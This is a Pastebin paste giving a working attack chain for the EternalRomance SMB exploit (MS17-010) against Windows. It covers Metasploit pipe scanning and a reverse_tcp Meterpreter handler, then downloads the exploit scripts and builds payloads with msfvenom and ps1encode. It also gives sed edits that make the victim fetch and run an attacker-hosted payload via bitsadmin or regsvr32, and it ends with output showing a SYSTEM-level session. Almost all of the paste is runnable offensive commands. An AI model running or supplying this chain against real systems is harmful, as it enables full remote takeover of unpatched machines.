API tools faq
paste
illwill

EternalRomance Python Example with ReverseTCP Meterpreter

illwill
Sep 30th, 2017
290
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.61 KB | None | 0 0
raw download clone embed print report
  1. #1. - Test victim IP first to see if exploitable
  2. msfconsole
  3. use auxiliary/scanner/smb/pipe_auditor
  4. set RHOSTS 192.168.128.19
  5. exploit
  6.  
  7. #*choose any pipe name 'netlogon', 'spoolss', 'browser' etc...
  8.  
  9. ######Exploiting the Victim##########
  10. #2. - Setup Meterpreter Handler in console 1
  11. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
  12. touch meterpreter.rc
  13. echo use exploit/multi/handler >> meterpreter.rc
  14. echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
  15. echo set LHOST $IP >> meterpreter.rc
  16. echo set ExitOnSession false >> meterpreter.rc
  17. echo exploit -j -z >> meterpreter.rc
  18. msfconsole -r meterpreter.rc
  19.  
  20. or
  21.  
  22. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
  23. msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"
  24.  
  25. #3. - Grab Exploit Scripts in console 2
  26. wget https://www.exploit-db.com/download/42315-O EternalRomance.py
  27. wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
  28.  
  29. #4a. - Payload Choice #1 - Create EXE payload using bitsadmin dl and execute
  30. msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
  31. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
  32. sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py
  33.  
  34. #4b. - Payload Choice #2 - Create SCT payload with regsvr32 dl with scrobj.dll
  35. git clone https://github.com/CroweCybersecurity/ps1encode .
  36. IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
  37. echo $IP | ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST='puts ARGF.read' --LPORT=4444 -t sct
  38. chmod +x ./index.sct && mv ./index.sct /var/www/html/1.sct
  39. sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''regsvr32 \/s \/n \/u \/i:http:\/\/'$IP'\/1.sct scrobj.dll'\'')/g' EternalRomance.py
  40.  
  41. #5. - Start Webserver
  42. service apache2 start
  43.  
  44.  
  45. ##################################
  46. # Exploit that motherfucker (change the ip obviously)
  47. python EternalRomance.py 192.168.128.19 netlogon
  48.  
  49.  
  50. [*] Sending stage (957487 bytes) to 192.168.128.19
  51. [*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
  52. msf exploit(handler) > sessions -i 1
  53. [*] Starting interaction with 1...
  54. meterpreter > getuid
  55. Server username: NT AUTHORITY\SYSTEM
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!